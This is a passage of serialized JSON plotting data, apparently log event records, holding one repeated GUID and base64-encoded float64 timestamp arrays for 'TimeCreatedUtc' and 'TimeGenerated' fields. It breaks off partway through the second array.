",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":{\"__ndarray__\":\"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Yo12QgBQdoFijXZCADCZiGKNdkIAEJuIYo12QgAQjYxijXZCAFCOjGKNdkIAsLqRYo12QgAg7ZFijXZCAPD3kWKNdkIAcPmRYo12QgBw+pFijXZCAHAnl2KNdkIAgCiXYo12QgDAVpxijXZCAABYnGKNdkIA0IWhYo12QgAwiaFijXZCAKDupmKNdkIAgPCmYo12QgCwHaxijXZCADAfrGKNdkIAYEyxYo12QgBATrFijXZCAAB6tmKNdkIAEHu2Yo12QgDQprtijXZCAECou2KNdkIAcNTAYo12QgCA1sBijXZCAJAAxmKNdkIA0AHGYo12QgBwL8tijXZCAMAxy2KNdkIAsFzQYo12QgCAXdBijXZCAJCL1WKNdkIAoI3VYo12QgCQudpijXZCAPC92mKNdkIAEKfgYo12QgDwp+BijXZCAMBG6GKNdkIAcEjoYo12QgAAiehijXZCAHDM5GSNdkIA0LRTaI12QgDwJI9qjXZCANAW6mqNdkIAsBfqao12QgAAnMJrjXZCAPD4t2yNdkIA8Pm3bI12QgDQBbhsjXZCALAGuGyNdkIAsAe4bI12QgAwu7tsjXZCAEC8u2yNdkIA8GnAbI12QgAwa8BsjXZCAKAVxmyNdkIAsE7GbI12QgDAWcZsjXZCAJBaxmyNdkIAcFvGbI12QgDgXMZsjXZCACBexmyNdkIAcGDGbI12QgAQYsZsjXZCACBjxmyNdkIAkGTGbI12QgAwZcZsjXZCALBmxmyNdkIAIGjGbI12QgDwaMZsjXZCABBrxmyNdkIA4GvGbI12QgDwbMZsjXZCAEBwxmyNdkIAIO/GbI12QgCQ8MZsjXZCAFAoyWyNdkIAkCnJbI12QgBQmM1sjXZCADCazWyNdkIAUNLPbI12QgBg089sjXZCAKDH0myNdkIAgMnSbI12QgBA9ddsjXZCACD312yNdkIAYPjXbI12QgBw+ddsjXZCANCo3GyNdkIAcNzcbI12QgAQ5txsjXZCAODm3GyNdkIAUOjcbI12QgAQl+FsjXZCACCY4WyNdkIAcEXmbI12QgCwRuZsjXZCALD26myNdkIA0CbrbI12QgBw8O9sjXZCABDy72yNdkIAcK/0bI12QgCwsPRsjXZCAABf+WyNdkIAcGD5bI12QgAwD/5sjXZCAEAQ/myNdkIAkL0CbY12QgAAvwJtjXZCALBrB22NdkIAkG0HbY12QgCQHQxtjXZCAJAeDG2NdkIAYM4QbY12QgCQ/xBtjXZCABCtFW2NdkIA4K0VbY12QgCQWxptjXZCANBcGm2NdkIAMAsfbY12QgBQDx9tjXZCAABMIG2NdkIAEE0gbY12QgAgxSJtjXZCANDGIm2NdkIAMO4obY12QgAwhDFvjXZCANBroHKNdkIAsFmuc412QgAQ03R0jXZCADBUD3aNdkIAULAEd412QgBQsQR3jXZCAAC9BHeNdkIA0L0Ed412QgAQvwR3jXZCACDuCHeNdkIAMO8Id412QgAw3A13jXZCALDdDXeNdkIAUFUQd412QgAQhhB3jXZCAFCQEHeNdkIAUJEQd412QgBgkhB3jXZCADCTEHeNdkIAcJQQd412QgBwnRB3jXZCABCfEHeNdkIA8KAQd412QgAwohB3jXZCAOCjEHeNdkIAsKQQd412QgBgphB3jXZCABCoEHeNdkIAgKkQd412QgCAsxB3jXZCAGC1EHeNdkIAMLYQd412QgCwtxB3jXZCADC7EHeNdkIAIN8Xd412QgAw4Rd3jXZCABDUG3eNdkIAENUbd412QgDwwSB3jXZCANDDIHeNdkIAUPQkd412QgBQ9SR3jXZCADAYLHeNdkIA4Bksd412QgBATS93jXZCAFBPL3eNdkIAgEAzd412QgCQQTN3jXZCAEByN3eNdkIAEKQ3d412QgDQrTd3jXZCALCuN3eNdkIAsK83d412QgBA4Tt3jXZCAFDiO3eNdkIAwD5Ad412QgBwQEB3jXZCAFBxRHeNdkIAIKNEd412QgDw0Uh3jXZCANDTSHeNdkIAcAJNd412QgCwA013jXZCAJAzUXeNdkIAQDVRd412QgDAZVV3jXZCAJBmVXeNdkIAIJhZd412QgCQmVl3jXZCAODJXXeNdkIAMMxdd412QgBw/GF3jXZCAID9YXeNdkIAkC1md412QgBgX2Z3jXZCAPCQaneNdkIAwJFqd412QgDgwm53jXZCAJDEbneNdkIAcPRyd412QgBg+HJ3jXZCAHCld3eNdkIAsKZ3d412QgBwEn13jXZCAOATfXeNdkIAQAWBd412QgDgf+N3jXZCANA8fnmNdkIAAEYOe412QgDQRg57jXZCAHAk7XyNdkIA0B+MR412QgAAByt/jXZCADAMXICNdkIAIGlR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\",\"dtype\":\"float64\",\"shape\":[1010]},\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAEADKPY12QgAQvpdIjXZCACDrmUiNdkIAcFlbSY12QgCAhOBJjXZCAJCrEkyNdkIAwNsUTI12QgAwbk9NjXZCAEC2202NdkIAwPTbTY12QgCQ9dtNjXZCAJBK3E2NdkIAUFPcTY12QgCQXdxNjXZCACBT3E2NdkIAUFjcTY12QgDQadxNjXZCAFBs3E2NdkIAAG7cTY12QgCAcNxNjXZCADBz3E2NdkIAQMPdTY12QgCww91NjXZCAPDJ3U2NdkIAkMrdTY12QgBwNt5NjXZCABA33k2NdkIAAGrqTY12QgCgaupNjXZCAJDhCE6NdkIAoOIITo12QgAwhY1OjXZCAHCGjU6NdkIAcIqNTo12QgBQjY1OjXZCAHCmqE6NdkIAYDupTo12QgAQPJVPjXZCABA9lU+NdkIAcOxwUI12QgDw7XBQjXZCAHCwTFGNdkIA0LRMUY12QgDApXdRjXZCAGCmd1GNdkIAcCQEU412QgDwJQRTjXZCAOCgllONdkIAsKGWU412QgCgl7tUjXZCAHCYu1SNdkIA8I3mVI12QgCQjuZUjXZCAEAMc1aNdkIAEA1zVo12QgBQDXNWjXZCAAAQc1aNdkIA0H8qWI12QgCwgCpYjXZCANB2VViNdkIA0HdVWI12QgAQeE9ZjXZCAOB4T1mNdkIA0PPhWY12QgCA9eFZjXZCAHBomVuNdkIAUGmZW412QgAwX8RbjXZCAKBfxFuNdkIAcOQrXI12QgAQ5StcjXZCALDcUF2NdkIAsN1QXY12QgDgUAhfjXZCALBRCF+NdkIAsFEIX412QgAgUghfjXZCAKBHM1+NdkIAQEgzX412QgBAxL9gjXZCAIDFv2CNdkIAoLvkYY12QgBwvORhjXZCALA4d2KNdkIAUDl3Yo12QgAQMKJijXZCAHAwomKNdkIA4KwuZI12QgDAri5kjXZCANAnwWSNdkIAcCjBZI12QgDQH+ZljXZCABAh5mWNdkIAEBgRZo12QgCwGBFmjXZCALCUnWeNdkIA8JWdZ412QgBQlZ1njXZCACCWnWeNdkIAQAhVaY12QgBQCVVpjXZCALABgGmNdkIAIAKAaY12QgCg/3lqjXZCAHAAemqNdkIAEH0Ma412QgDwfQxrjXZCAHDww2yNdkIAUPHDbI12QgBQ6u5sjXZCAPDq7myNdkIA8G1WbY12QgCQblZtjXZCABBle26NdkIAIGZ7bo12QgAQ2DJwjXZCAODYMnCNdkIA4NgycI12QgBQ2TJwjXZCAGDTXXCNdkIA0NNdcI12QgCgS+pxjXZCALBM6nGNdkIAcEQPc412QgBQRQ9zjXZCAODAoXONdkIA8MGhc412QgDQu8xzjXZCADC8zHONdkIAcDRZdY12QgCANVl1jXZCABCw63WNdkIAsLDrdY12QgCwqBB3jXZCAJCvEHeNdkIA0KQ7d412QgCwpTt3jXZCAKAbyHiNdkIAsBzIeI12QgBwHMh4jXZCAOAcyHiNdkIA0I9/eo12QgDgkH96jXZCADCMqnqNdkIA0Iyqeo12QgBAiKR7jXZCABCJpHuNdkIA0AM3fI12QgDgBDd8jXZCAKB37n2NdkIAsHjufY12